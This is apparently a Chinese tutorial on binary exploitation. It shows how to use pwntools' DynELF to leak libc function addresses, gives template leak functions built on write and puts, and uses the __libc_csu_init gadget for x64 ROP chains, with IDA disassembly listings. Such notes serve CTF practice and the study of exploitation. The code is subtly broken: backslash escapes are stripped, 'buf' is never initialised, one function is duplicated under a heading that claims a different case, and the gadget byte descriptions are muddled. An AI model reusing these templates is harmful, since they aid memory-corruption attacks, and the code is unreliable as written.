在没有libc的时候,使用pwntools的DynELF可以来泄露地址
leak函数格式
p = process('./xxx')
def leak(address):
payload = "xxxxxxxx" + address + "xxxxxxxx"
p.send(payload)
#各种处理
data = p.recv(4)
log.debug("%#x => %s" % (address, (data or '').encode('hex')))
return data
d = DynELF(leak, elf=ELF("./xxx")) #初始化DynELF模块
systemAddress = d.lookup('system', 'libc') #在libc文件中搜索system函数的地址
address是需要泄露地址的信息,payload就是触发目标程序泄漏address处信息的攻击代码。
当我们想要调用system函数,就必须找到一个可以泄漏目标程序内部的地址,进而计算出偏移。
文章上介绍的是很常见的puts,write函数
Linux:
write(fd, addr, len) x86下就是正常的参数从右向左进栈。
在x64下通常是rdi,rsi,rdx,rcx,r8,r9从左向右来接收参数,更多的才写到栈上。所以当rop链不能构成时就可以使用 __libc_csu_init函数中的通用gadget。
_libc_csu_init函数是程序调用libc库用来对程序进行初始化的函数,一般先于main函数执行
text:00000000004006E0 ; void _libc_csu_init(void)
.text:00000000004006E0 public __libc_csu_init
.text:00000000004006E0 __libc_csu_init proc near ; DATA XREF: _start+16↑o
.text:00000000004006E0 ; __unwind {
.text:00000000004006E0 push r15
.text:00000000004006E2 mov r15d, edi
.text:00000000004006E5 push r14
.text:00000000004006E7 mov r14, rsi
.text:00000000004006EA push r13
.text:00000000004006EC mov r13, rdx
.text:00000000004006EF push r12
.text:00000000004006F1 lea r12, __frame_dummy_init_array_entry
.text:00000000004006F8 push rbp
.text:00000000004006F9 lea rbp, __do_global_dtors_aux_fini_array_entry
.text:0000000000400700 push rbx
.text:0000000000400701 sub rbp, r12
.text:0000000000400704 xor ebx, ebx
.text:0000000000400706 sar rbp, 3
.text:000000000040070A sub rsp, 8
.text:000000000040070E call _init_proc
.text:0000000000400713 test rbp, rbp
.text:0000000000400716 jz short loc_400736
.text:0000000000400718 nop dword ptr [rax+rax+00000000h]
.text:0000000000400720
.text:0000000000400720 loc_400720: ; CODE XREF: __libc_csu_init+54↓j
************************************************************
.text:0000000000400720 mov rdx, r13
.text:0000000000400723 mov rsi, r14
.text:0000000000400726 mov edi, r15d
.text:0000000000400729 call qword ptr [r12+rbx*8]
.text:000000000040072D add rbx, 1
.text:0000000000400731 cmp rbx, rbp
.text:0000000000400734 jnz short loc_400720
.text:0000000000400736
.text:0000000000400736 loc_400736:
; CODE XREF: __libc_csu_init+36↑j
*************************************************************
.text:0000000000400736 add rsp, 8
.text:000000000040073A pop rbx
.text:000000000040073B pop rbp
.text:000000000040073C pop r12
.text:000000000040073E pop r13
.text:0000000000400740 pop r14
.text:0000000000400742 pop r15
.text:0000000000400744 retn
这两部分便是gadget,0x040073A处可以把我们想要写入的数据来进行压栈。而且在里面隐藏了两个常用的gadget
图片.png
pop rdi;ret和pop rsi;pop r15
0x41 0x5f 0xc3
0x5f 0xc3
puts函数:puts(addr)从地址处输出字符串,当读到"\x00"时截断。
leak函数(之后没有其他输出)
def leak(address):
count = 0
data = ''
payload = xxx
p.send(payload)
print p.recvuntil('xxxn') #一定要在puts前释放完输出
up = ""
while True:
#由于接收完标志字符串结束的回车符后,就没有其他输出了,故先等待1秒钟,如果确实接收不到了,就说明输出结束了
#以便与不是标志字符串结束的回车符(0x0A)混淆,这也利用了recv函数的timeout参数,即当timeout结束后仍得不到输出,则直接返回空字符串””
c = p.recv(numb=1, timeout=1)
count += 1
if up == 'n' and c == "": #接收到的上一个字符为回车符,而当前接收不到新字符,则
buf = buf[:-1] #删除puts函数输出的末尾回车符
buf += "x00"
break
else:
buf += c
up = c
data = buf[:4] #取指定字节数
log.info("%#x => %s" % (address, (data or '').encode('hex')))
return data
还有其他输出
def leak(address):
count = 0
data = ''
payload = xxx
p.send(payload)
print p.recvuntil('xxxn') #一定要在puts前释放完输出
up = ""
while True:
#由于接收完标志字符串结束的回车符后,就没有其他输出了,故先等待1秒钟,如果确实接收不到了,就说明输出结束了
#以便与不是标志字符串结束的回车符(0x0A)混淆,这也利用了recv函数的timeout参数,即当timeout结束后仍得不到输出,则直接返回空字符串””
c = p.recv(numb=1, timeout=1)
count += 1
if up == 'n' and c == "": #接收到的上一个字符为回车符,而当前接收不到新字符,则
buf = buf[:-1] #删除puts函数输出的末尾回车符
buf += "x00"
break
else:
buf += c
up = c
data = buf[:4] #取指定字节数
log.info("%#x => %s" % (address, (data or '').encode('hex')))
return data
